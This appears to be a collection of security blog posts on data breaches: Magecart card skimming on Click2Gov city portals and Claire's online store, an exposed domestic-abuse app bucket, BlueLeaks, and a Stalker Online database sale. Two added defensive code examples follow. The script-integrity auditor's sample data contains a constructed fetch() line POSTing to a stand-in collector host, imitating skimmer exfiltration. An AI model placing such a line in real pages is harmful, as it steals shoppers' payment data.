Tags: Click2Gov, credit card, data breach, Data loss, MageCart, Malware

What do they have in common? The Click2Gov online utility payment system

Websites of eight US cities poisoned by malware skimming the credit card details of residents


Beware if you’re paying your bills for local government services – the payment information you type into that web form may be heading straight to cybercriminals.

Security experts at Trend Micro report that they have identified eight cities in the USA where online payment portals have been compromised to host Magecart-style credit card skimming code.

Magecart is a family of JavaScript malware used to steal credit card details and personal information from unsuspecting internet users as they interact with websites – often as sensitive details are entered to make a purchase.

What makes this type of attack often more serious than a conventional data breach, is that most companies do not store your full credit card details, such as your CVV security code. But those details are entered on online checkout forms by consumers, and can be stolen by a malicious script hidden in the website’s code.

As Trend Micro explains, the common factor between the affected websites they have uncovered is that they all use the third-party Click2Gov platform:

These sites all appear to have been built using Click2Gov, a web-based platform meant for use by local governments. It is used to provide services such as community engagement, issues reporting, and online payment for local governments. Residents can use the platform to pay for city services, such as utilities.

According to the researchers, the attacks against the eight unnamed US cities started in April, when malicious JavaScript code was planted on the websites, silently harvesting credit card details and residents’ personal information as they entered it into online payment forms.


Credit card skimming attack chain. Source: Trend Micro.

Unlike other skimmers which grab data on various types of payment forms, the skimmer used here is rather simple and only works on a Click2Gov payment form. No obfuscation or anti-debugging techniques were used. The skimmer hooks the submit event of the payment form; when a victim clicks the button to send the payment information, the skimmer will grab the information from the selected columns inside the payment form and immediately send the collected information to a remote server via an HTTP POST request.

Details exfiltrated by the script to a remote server under the hackers’ control included credit card numbers, CVV security codes, card expiry dates, cardholder’s name, address, and postal code.

Simple the skimming code might be, but that doesn’t mean it’s not effective.




Rightly or wrongly, Click2Gov is earning itself a bad reputation. In recent years security researchers have been tracking attacks launched against the Click2Gov payment portal, with reports of breaches involving city websites stretching across the United States and Canada.

Late last year, for instance, the city of College Station admitted its Click2Gov online utility payment system had been hacked for some months, as had the City of Waco’s Click2Gov portal for water bill payments.

The onus is on cities to follow best practices when building and maintaining their online payment systems, ensuring that patches and security updates are applied in a timely fashion and that networks are properly secured.

Meanwhile, other websites with payment forms online would be wise to remember that credit-card skimming attacks are not limited to local governments taking payments from residents.

Magecart-style attacks have been seen hitting a diverse range of victims, including hotel chain booking websites, academic campuses, as well as the likes of Ticketmaster, British Airways, Forbes, Umbro, Vision Direct, and Newegg.

If you’re making online purchases (and hey, these days, who isn’t?) you might want to investigate disposable virtual payment cards, so you’re never exposing your real life credit card to the websites to which you are making a payment. A virtual card could be locked to a single merchant, have a limited amount that can be used in a single payment, or be single-use.


Tags: Android, AWS, data breach, Data loss, domestic abuse, Guest blog, iOS

On the face of it, it sounded like a good idea.

A smartphone app, disguised as a regular app delivering the top world, sports, and entertainment news, containing a secret feature that allows victims of domestic abuse to send a covert distress call for help at the touch of a button.

That was the idea behind the free Aspire News App, launched some years ago by When Georgia Smiled, a US non-profit founded by Robin McGraw and her husband US TV star “Dr Phil” to help victims of domestic violence and sexual assault.

To be honest, that still sounds like a good idea to me – if the app is coded well, and if any data it collects is properly secured.

But what isn’t a good idea is for voice recordings made by the app to be left exposed on an unsecured Amazon Web Services (AWS) S3 bucket, allowing anyone with internet access to download them and listen if they so wish.

According to security researchers at VPN Mentor, who found the exposed data, over 4,000 voice recordings of emergency messages left by victims of domestic violence were available to access – no password required.

Some of the 230MB worth of recordings included personally identifiable information such as names, home addresses, as well as the identities of violent abusers.

Transcripts of just two of the recordings that were exposed reveal the seriousness of the situation:

“[Full Name] is threatening or hurting me. Please send help now. [Full address]”


“Please call the police right away and have them come to [Full Address]. I am in great danger. I need you to send the police right away, please…”

Potentially, if the information fell into the wrong hands, it could not only expose people who did not want the data revealed to the risk of extortion, but also put victims in greater physical danger if their abuser found out.

The researchers attempted to reach out to When Georgia Smiled and the Dr. Phil Foundation to get the serious data breach fixed last Wednesday, but ultimately it took the involvement of AWS itself to get the unsecured web bucket shut down.

So, that’s a happy end to the story, right?

Well, perhaps not.

You see, a security failure like this could lead to victims of domestic abuse losing confidence in Aspire News App. If they do not feel safe any longer using the app, they may find it harder to escape abusive relationships safely.

That clearly wasn’t what Dr Phil and his wife Robin McGraw wanted – the Aspire News app was supposed to help people escape dangerous situations, not make it even harder to find a way out.


Tags: bitcoin, BlueLeaks, data breach, Data loss, DDoSecrets, Elon Musk, Podcast, Privacy, Smashing Security, YouTube

Industry veterans, chatting about computer security and online privacy.

Smashing Security podcast #184: Vanity Bitcoin wallets, BlueLeaks, and a Coronavirus app conspiracy


A conspiracy spreads on social media about Coronavirus tracing apps, US police find decades’ worth of sensitive data leaked online, and is there a Bitcoin bonanza to be had from watching Elon Musk YouTube videos?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by BBC technology reporter Zoe Kleinman.


Graham Cluley – @gcluley
Carole Theriault – @caroletheriault


Zoe Kleinman – @zsk


Tags: data breach, Data loss, Guest blog, Law & order, Twitter

The activist group Distributed Denial of Secrets, perhaps better known by their shorter but clumsy moniker DDoSecrets, has been permanently banned from Twitter.

The self-declared “transparency collective”, which published leaked and hacked data it claimed was of public interest, earned its banishment from Twitter after it distributed a gigantic collection of sensitive documents related to police and law enforcement across the United States.

As we previously reported, the 270GB data dump (dubbed “BlueLeaks”) contains many years’ worth of information from over 200 US police departments, FBI reports, and other law enforcement agencies.

As investigative journalist Brian Krebs reports, the data appears to have been exfiltrated following a security breach at web development firm Netsential.

The publication of the data appears to have been deliberately timed by DDoSecrets to coincide with “Juneteenth”, the United States’s national day of commemoration of the ending of slavery, June 19th.

Unfortunately, the group’s haste to release the data in time appears to have overtaken any desire to redact details which could put innocent parties at risk: such as images of suspects in police investigations, banking details, and other personally identifiable information (PII).

There are additionally concerns that the breach could endanger ongoing police investigations, and the lives of law enforcement officers.

And as the dumped data contains information reaching back as far as perhaps the mid-1990s, there is additionally the risk that information may be completely out-of-date.

Speaking to Wired, DDoSecrets founder Emma Best admitted that the group had probably failed to redact all information related to crime victims, children, and unrelated private businesses:

“Due to the size of the dataset, we probably missed things. I wish we could have done more, but I’m pleased with what we did and that we continue to learn.”

That’s a startling admission of failure. Clearly more could have been done, but from the sound of things DDoSecrets and its supporters were working to too tight a deadline.

And clearly Twitter was not impressed to see the dissemination of the hacked data, which is in conflict with its policies.

Having been criticised in the past for its tardy response in banning other hacking groups, such as The Dark Overlord, DC Leaks, and Guccifer 2.0, Twitter clearly felt it couldn’t stand silent while the BlueLeaks data leak was being so overtly disseminated on its platform.

Such a ban, however, may not silence DDoSecrets permanently. Don’t be surprised if they pop up again, in a new guise, to share stolen secrets on Twitter.


Tags: data breach, Data loss, MMORPG, Stalker Online, video game

Stalker Online hacked! Over one million gamers' details put on sale


More than one million players of the video game Stalker Online have been put at risk after hackers offered their details for sale on the darknet.

As Cybernews reports, a database containing over 1.2 million Stalker Online user records is being sold on hacking forums. Separately, another database which is said to contain more than 136,000 records from the game’s forums is also being offered for sale.

Cybernews says it found the database for sale on a popular hacking forum on May 5, with a link to a defaced page on the Stalker Online website offered as “proof” that the game’s servers had been hacked.

Defaced Stalker Online webpage. Source: Cybernews.

The security of this web server has been compromised and all your files and userdata are now in our possession.

Contact us on [REDACTED] for assistance in securing your web server. If not reach within 24 hours – data gathered will be posted publicly for all to download

Of course, a defaced webpage is not evidence of a data breach. Controversially, Cybernews purchased the user database from the hacker, and says that it was able to confirm that the samples of the Stalker Online database “are genuine and the email addresses therein are deliverable.”

Purchasing stolen data from cybercriminals makes me extremely uncomfortable. It could be argued that anyone purchasing hacked databases – whether it be security researchers, journalists, or criminal fraudsters – is encouraging further hacks to occur by generating a demand for more stolen data.

The database, which is being offered for sale for “several hundred Euros worth of Bitcoins”, contains 1,289,084 Stalker Online player records, including usernames, account passwords, email addresses, phone numbers, and IP addresses.

Passwords are MD5 hashed and salted, which is certainly better than if they were held in plaintext, but such a weak algorithm may not present much of a challenge to criminals determined to crack them.
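For site operators still holding salted MD5 password records, the following added example (not code from the article or from Stalker Online) shows one way to strengthen them: wrap each stored digest in a slow key-derivation function straight away, then re-hash properly when the user next logs in. The `salt || password` MD5 layout, the record fields and the work factor are assumptions made for illustration.

```python
import hashlib
import hmac
import os

ROUNDS = 600_000  # assumed PBKDF2 work factor; tune to your own hardware


def legacy_md5(password: str, salt: bytes) -> str:
    # Assumed legacy layout: hex(MD5(salt || password)).
    return hashlib.md5(salt + password.encode()).hexdigest()


def slow_hash(secret: str, salt: bytes) -> str:
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, ROUNDS).hex()


def wrap_legacy(record: dict) -> dict:
    """Offline step: protect an existing MD5 record without knowing the password."""
    salt = os.urandom(16)
    return {"scheme": "pbkdf2-over-md5", "md5_salt": record["salt"],
            "salt": salt, "hash": slow_hash(record["hash"], salt)}


def new_record(password: str) -> dict:
    salt = os.urandom(16)
    return {"scheme": "pbkdf2", "salt": salt, "hash": slow_hash(password, salt)}


def verify(record: dict, password: str) -> tuple:
    """Check a login; return (ok, record), where record may have been upgraded."""
    if record["scheme"] == "md5":
        candidate = legacy_md5(password, record["salt"])
    elif record["scheme"] == "pbkdf2-over-md5":
        inner = legacy_md5(password, record["md5_salt"])
        candidate = slow_hash(inner, record["salt"])
    else:
        candidate = slow_hash(password, record["salt"])
    ok = hmac.compare_digest(candidate, record["hash"])
    if ok and record["scheme"] != "pbkdf2":
        record = new_record(password)  # the plaintext is only available at login
    return ok, record


# Constructed sample record in the assumed legacy format.
_salt = b"constructed-salt"
LEGACY = {"scheme": "md5", "salt": _salt, "hash": legacy_md5("correct horse", _salt)}
```

Running `wrap_legacy` over every row means a copy of the table taken afterwards no longer contains bare MD5 digests, even for accounts that never log in again.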

Cybernews says that it contacted the ecommerce platform that was hosting the hacker’s online store, and it has now been taken offline. However, that’s no guarantee that it will not be offered for sale elsewhere, or that anyone else might have purchased the database.




So, players of the free-to-play MMORPG, set in a post-apocalyptic world, should really consider their details are now compromised. Hackers may have not only your username, email address, and phone number. They may also have cracked your password.

And if you made the mistake of reusing that password anywhere else on the internet, then there is a chance they could use that information to compromise your other online accounts.

Furthermore, you should obviously be aware that you might be targeted with phishing attacks, exploiting the information contained inside the database.

According to Cybernews, the makers of Stalker Online have not responded to messages related to the security breach.

Tags: Claire's, data breach, Data loss, Guest blog, MageCart, Malware, Vulnerability

On March 20th, the Claire’s accessories retail chain beloved by young girls around the world made the sensible decision to close all of its physical stores in response to the Coronavirus Covid-19 pandemic.

Anyone wanting to purchase costume jewellery, make-up, or hair accessories would have to skip the trip to the shopping mall and visit Claire’s online store instead.

A nuisance, for sure.  But also an opportunity if you were a malicious hacker.

As security researcher Willem de Groot of Sansec reports, within 24 hours of Claire’s bricks-and-mortar stores closing for business, someone had registered the domain

This domain was then used, the following month, to exfiltrate information entered on the checkout pages of Claire’s online store and its sister brand Icing.

Hackers managed to gain write-access to Claire’s website, and inject an otherwise legitimate piece of JavaScript used by the site with additional code which skimmed customer and full payment details from online purchasers as soon as they tried to “checkout.”

Attacks like this are, unfortunately, not uncommon.  Most notoriously, malicious code known as Magecart has been used to steal sensitive information from unsuspecting internet users.

What’s so dangerous about a Magecart attack is that it doesn’t matter if a company does not store all of your credit card payment details (such as your CVV security code). Nor does a Magecart attack have to break into a company’s database or crack sophisticated encryption to extract sensitive information.

Instead, Magecart’s malicious script can lurk on a company’s website watching the information as it is entered by customers into a payment form, and send it to the waiting hackers.

Companies whose customers have been impacted by past Magecart attacks include Ticketmaster, British Airways, Feedify, Umbro, Vision Direct, Newegg, Sweaty Betty, SHEIN, Nutribullet, the American Cancer Society… and many many more.

Often these attacks are orchestrated through “supply-chain” attacks, where the hackers poison a third-party script used by a website and therefore don’t need to breach the website’s own defences to steal from customers as they shop.

However, in the case of Claire’s it appears that the hackers did actually gain access to the online store’s infrastructure.

This raises some interesting questions.

Firstly, how did the hackers gain access to the website in order to plant their malicious code?  Did they exploit a vulnerability on the website, was a member of staff phished, or was this part of a wider exploitation of Claire’s infrastructure?

The next obvious follow-up question is what has Claire’s done to ensure that a similar breach doesn’t happen again?

In a statement the firm says that upon being notified by Sansec of the security breach, it removed the offending code.

“On Friday, we identified an issue related to our e-commerce platform and took immediate action to investigate and address it. Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process. We removed that code and have taken additional measures to reinforce the security of our platform. We are working diligently to determine the transactions that were involved so that we can notify those individuals.”

It’s good to see action has been taken, and that customers will be notified, but what should not be ignored is that some online stores have been haunted by repeat infections.  Research produced by Willem de Groot, for instance, has warned in the past that 20% of Magecart-compromised merchants find their internet stores reinfected within days.

And finally, what is to be made of the four weeks or so between the registration of the domain and the launch of the hackers’ web-skimming attack against customers of Claire’s?

All the evidence points to a determined effort by the hackers to find a weakness at Claire’s that could be exploited to plant the code.  It seems to me that criminals knew that with the closure of its shopping mall stores, there would be an increase in online purchases… and were hellbent on taking advantage of the retail lockdown to fill their pockets.

Some retailers in some countries are beginning to take tentative steps out of lockdown, opening their doors again to shoppers.  They would be wise to continue to watch their websites carefully for web-skimming attacks like the one which hit Claire’s.
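One way to watch for the tampering described above, where a legitimate script served by the store gained extra code that sent data to a newly registered domain, is to compare what the site serves against a known-good baseline and report any host a changed script did not reference before. This is an added example, not code from Sansec or Claire's; the paths, hostnames and script contents are constructed.

```python
import hashlib
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")


def sha256_hex(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def hosts_in(content: bytes) -> set:
    """Hostnames of absolute URLs appearing anywhere in a script."""
    text = content.decode("utf-8", errors="replace")
    return {urlparse(u).hostname for u in URL_RE.findall(text)} - {None}


def build_baseline(scripts: dict) -> dict:
    """Record the hash and referenced hosts of each known-good script."""
    return {path: {"sha256": sha256_hex(body), "hosts": hosts_in(body)}
            for path, body in scripts.items()}


def audit(baseline: dict, current: dict, allowed_hosts: set) -> list:
    """Compare what is served now with the baseline; return a list of findings."""
    findings = []
    for path, body in sorted(current.items()):
        known = baseline.get(path)
        if known is None:
            extra = hosts_in(body) - allowed_hosts
            findings.append((path, "unexpected script", sorted(extra)))
        elif sha256_hex(body) != known["sha256"]:
            # A changed file that also talks to a new host deserves urgent review.
            extra = hosts_in(body) - known["hosts"] - allowed_hosts
            findings.append((path, "content changed", sorted(extra)))
    for path in sorted(set(baseline) - set(current)):
        findings.append((path, "script missing", []))
    return findings


# Constructed sample data: a known-good release and what the site serves later.
GOOD = {
    "/js/checkout.js": b"function total(c){return c.items.length}\n",
    "/js/analytics.js": b'var endpoint="https://stats.shop.example/v1";\n',
}
SERVED = dict(GOOD)
SERVED["/js/checkout.js"] = GOOD["/js/checkout.js"] + (
    b'fetch("https://collector.example/c",{method:"POST"});\n'  # constructed tampering
)
```

Fetching `current` from the live site as a visitor would, rather than reading files on the build server, also catches changes made directly on the web server, and re-running the audit on a schedule helps spot reinfection.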
